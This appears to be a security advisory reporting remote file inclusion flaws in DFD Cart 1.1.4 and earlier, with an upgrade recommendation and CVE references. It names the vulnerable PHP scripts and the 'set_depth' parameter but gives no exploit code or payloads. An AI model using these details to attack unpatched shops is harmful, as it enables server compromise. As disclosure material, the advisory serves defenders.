|
Description
|
|
Multiple vulnerabilities have been identified in DFD Cart, which could be exploited by attackers to execute arbitrary commands. These issues are caused by input validation errors in the "app.lib/product.control/core.php/product.control.config.php", "app.lib/product.control/core.php/customer.area/customer.browse.list.php" and "app.lib/product.control/core.php/customer.area/customer.browse.search.php" scripts when processing the "set_depth" parameter, which could be exploited by remote attackers to include malicious scripts and execute arbitrary commands with the privileges of the web server.
Note : An unspecified cross site scripting vulnerability has also been reported.
|
|
|
|
|
|
Vulnerable Products
|
|
Vulnerable Software:
DFD Cart version 1.1.4 and prior
|
|
|
|
|
|
Solution
|
|
Upgrade to DFD Cart version 1.1.5 :
http://sourceforge.net/projects/dfdcart/
|
|
|
|
|
|
CVE
|
|
CVE-2007-5136
CVE-2007-5098
|
|
|
|
|
|
References
|
|
http://sourceforge.net/forum/forum.php?forum_id=738710
|
|
|
|
|
|
Vulnerability Manager Detection
|
|
No
|
|
|
|
|
|
IPS Protection
|
|
|
|
|
|
|
